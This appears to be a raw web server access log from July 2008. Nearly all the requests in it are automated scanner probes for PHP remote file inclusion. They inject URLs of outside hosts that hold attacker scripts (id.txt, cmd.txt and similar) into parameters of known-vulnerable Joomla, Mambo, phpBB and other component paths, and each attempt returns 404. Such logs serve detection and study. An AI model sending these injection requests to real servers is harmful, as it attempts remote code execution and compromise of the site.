194.109.22.108 - - [31/Jul/2008:07:39:14 -0500] "GET //home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
194.109.22.108 - - [31/Jul/2008:07:39:21 -0500] "GET /logs//home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
194.109.22.108 - - [31/Jul/2008:07:39:21 -0500] "GET //home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
61.95.176.38 - - [31/Jul/2008:07:39:41 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
213.193.229.20 - - [31/Jul/2008:07:39:56 -0500] "GET /logs/access_log.1214438400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 382 "-""libwww-perl/5.803"
213.193.229.20 - - [31/Jul/2008:07:39:56 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
213.193.229.20 - - [31/Jul/2008:07:39:57 -0500] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
66.225.213.252 - - [31/Jul/2008:07:40:11 -0500] "GET /logs/access_log.1213315200/modules/my_egallery/index.php?do=showgall&gid=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
213.193.229.20 - - [31/Jul/2008:07:40:43 -0500] "GET /logs/access_log.1212883200/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 382 "-""libwww-perl/5.803"
80.67.26.157 - - [31/Jul/2008:07:41:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:07:41:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
208.75.225.10 - - [31/Jul/2008:07:41:35 -0500] "GET /logs/access_log.1212883200//modules/My_eGallery/public/displayCategory.php?basepath=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.811"
208.75.225.10 - - [31/Jul/2008:07:41:36 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
208.75.225.10 - - [31/Jul/2008:07:41:36 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
81.25.54.205 - - [31/Jul/2008:07:42:19 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:42:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
213.193.229.20 - - [31/Jul/2008:07:42:32 -0500] "GET /logs/access_log.1212883200%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 383 "-""libwww-perl/5.803"
75.125.143.162 - - [31/Jul/2008:07:43:02 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
75.125.143.162 - - [31/Jul/2008:07:43:02 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.80.193.31 - - [31/Jul/2008:07:43:36 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; BT Openworld BB; yplus 5.3.04d)"
212.113.24.150 - - [31/Jul/2008:07:44:49 -0500] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:44:49 -0500] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.84.182.98 - - [31/Jul/2008:07:45:06 -0500] "GET /logs//home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:45:06 -0500] "GET /logs//home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:45:06 -0500] "GET //home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:45:06 -0500] "GET //home.php?action=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:45:10 -0500] "GET /logs//home.php?action=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:45:10 -0500] "GET //home.php?action=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:45:11 -0500] "GET /logs//home.php?action=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:07:45:12 -0500] "GET //home.php?action=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
81.25.54.205 - - [31/Jul/2008:07:45:20 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:45:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
195.93.201.102 - - [31/Jul/2008:07:45:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:07:45:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
67.18.151.242 - - [31/Jul/2008:07:45:57 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.18.151.242 - - [31/Jul/2008:07:45:57 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
81.25.54.205 - - [31/Jul/2008:07:46:57 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:46:58 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
67.18.151.242 - - [31/Jul/2008:07:47:09 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.18.151.242 - - [31/Jul/2008:07:47:10 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
212.113.24.150 - - [31/Jul/2008:07:47:54 -0500] "GET /logs//admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:47:55 -0500] "GET //admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.25.54.205 - - [31/Jul/2008:07:48:25 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:48:25 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:48:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:48:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:48:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:07:48:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
210.245.166.92 - - [31/Jul/2008:07:49:11 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:49:12 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.113.24.150 - - [31/Jul/2008:07:50:29 -0500] "GET /logs//errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:50:30 -0500] "GET //errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:50:32 -0500] "GET /logs//errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:50:33 -0500] "GET //errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:51:00 -0500] "GET /logs//admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:51:00 -0500] "GET //admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:51:31 -0500] "GET /logs//admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:51:31 -0500] "GET //admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
75.125.143.162 - - [31/Jul/2008:07:52:25 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.113.24.150 - - [31/Jul/2008:07:53:15 -0500] "GET /logs//errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:53:15 -0500] "GET //errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:53:19 -0500] "GET /logs//errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:53:19 -0500] "GET //errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.214.193 - - [31/Jul/2008:07:54:13 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
87.106.214.193 - - [31/Jul/2008:07:54:13 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
87.230.35.101 - - [31/Jul/2008:07:54:57 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:07:54:57 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:07:54:57 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:07:54:57 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
194.165.49.171 - - [31/Jul/2008:07:54:58 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
194.165.49.171 - - [31/Jul/2008:07:54:58 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
194.165.49.171 - - [31/Jul/2008:07:55:06 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
194.165.49.171 - - [31/Jul/2008:07:55:06 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.70.36.107 - - [31/Jul/2008:07:55:20 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
195.70.36.107 - - [31/Jul/2008:07:55:20 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
74.52.239.114 - - [31/Jul/2008:07:56:31 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
74.52.239.114 - - [31/Jul/2008:07:56:31 -0500] "GET //include/admin.lib.inc.php?site_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
89.97.0.11 - - [31/Jul/2008:07:56:36 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
89.97.0.11 - - [31/Jul/2008:07:56:36 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.97.0.11 - - [31/Jul/2008:07:56:40 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
89.97.0.11 - - [31/Jul/2008:07:56:40 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.113.24.150 - - [31/Jul/2008:07:58:46 -0500] "GET /logs//admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:58:46 -0500] "GET //admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:59:14 -0500] "GET /logs//admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:07:59:14 -0500] "GET //admin/spaw/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.233.85.46 - - [31/Jul/2008:07:59:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
193.233.85.46 - - [31/Jul/2008:07:59:38 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:08:02:35 -0500] "GET /logs/access_log.1214438400//Neos_Chronos/header.php?base_folder=http://www.adoradores.kit.net/general? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:02:37 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.adoradores.kit.net/general? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:02:39 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.adoradores.kit.net/general? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
68.202.147.70 - - [31/Jul/2008:08:03:17 -0500] "GET /logs/access_log.1213315200 HTTP/1.1" 200 262144 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.141.56.49 - - [31/Jul/2008:08:03:24 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
62.141.56.49 - - [31/Jul/2008:08:03:24 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
87.106.214.193 - - [31/Jul/2008:08:03:47 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.214.193 - - [31/Jul/2008:08:03:47 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.141.50.212 - - [31/Jul/2008:08:04:19 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
62.141.50.212 - - [31/Jul/2008:08:04:19 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
212.113.24.150 - - [31/Jul/2008:08:04:37 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:04:38 -0500] "GET //config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:04:46 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:04:46 -0500] "GET //config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.230.35.101 - - [31/Jul/2008:08:04:48 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:08:04:48 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
195.70.36.107 - - [31/Jul/2008:08:06:33 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
195.70.36.107 - - [31/Jul/2008:08:06:33 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:08:06:38 -0500] "GET /logs/access_log.1212883200//Neos_Chronos/header.php?base_folder=http://www.adoradores.kit.net/general? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
87.106.214.193 - - [31/Jul/2008:08:07:27 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.106.214.193 - - [31/Jul/2008:08:07:27 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:08:10:32 -0500] "GET /logs//admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:08:10:33 -0500] "GET //admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:08:10:37 -0500] "GET /logs//admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:08:10:37 -0500] "GET //admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:08:10:41 -0500] "GET /logs//admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
210.245.87.117 - - [31/Jul/2008:08:10:42 -0500] "GET //admin_words.php?phpbb_root_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:08:10:45 -0500] "GET /logs/access_log.1213142400//Neos_Chronos/header.php?base_folder=http://www.adoradores.kit.net/general? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
83.12.119.178 - - [31/Jul/2008:08:10:48 -0500] "GET /logs/db.php?path_local=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
212.113.24.150 - - [31/Jul/2008:08:10:55 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:10:55 -0500] "GET //config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
83.12.119.178 - - [31/Jul/2008:08:10:57 -0500] "GET /db.php?path_local=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 290 "-""libwww-perl/5.65"
83.12.119.178 - - [31/Jul/2008:08:11:01 -0500] "GET /db.php?path_local=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 290 "-""libwww-perl/5.65"
212.113.24.150 - - [31/Jul/2008:08:11:10 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:11:10 -0500] "GET //config/dbutil.bck.php?confdir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.230.35.101 - - [31/Jul/2008:08:11:29 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:08:11:29 -0500] "GET //oneadmin/config.php?path[docroot]=http://www-iw.uni-r.de/mamboiw/components/com_registration/pw.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
195.70.36.107 - - [31/Jul/2008:08:12:13 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
195.70.36.107 - - [31/Jul/2008:08:12:13 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:08:12:46 -0500] "GET /logs/access_log.1214438400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:12:46 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:12:47 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:08:13:08 -0500] "GET /logs//index.php?ROOT=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:08:13:08 -0500] "GET //index.php?ROOT=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.97.201.148 - - [31/Jul/2008:08:13:16 -0500] "GET /logs/errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
